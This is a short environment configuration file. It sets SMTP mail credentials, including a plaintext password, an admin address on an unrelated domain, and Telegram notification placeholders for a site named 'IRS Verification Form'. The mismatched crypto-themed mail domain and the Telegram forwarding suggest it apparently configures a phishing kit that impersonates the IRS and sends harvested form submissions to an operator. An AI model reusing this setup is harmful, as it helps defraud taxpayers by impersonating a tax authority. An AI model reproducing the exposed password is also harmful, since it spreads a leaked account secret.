# SMTP Configuration
SMTP_HOST=mail.privateemail.com
SMTP_PORT=587
SMTP_USERNAME=support@coinmmama.us
SMTP_PASSWORD=Adeyemi2025@
SMTP_ENCRYPTION=tls

# Admin Email
ADMIN_EMAIL=support@cbelko.net

# Telegram (if still needed for some notifications)
TELEGRAM_BOT_TOKEN=YOURBOT

TELEGRAM_CHAT_ID=Yourchatid
# Application Settings
SITE_NAME=IRS Verification Form
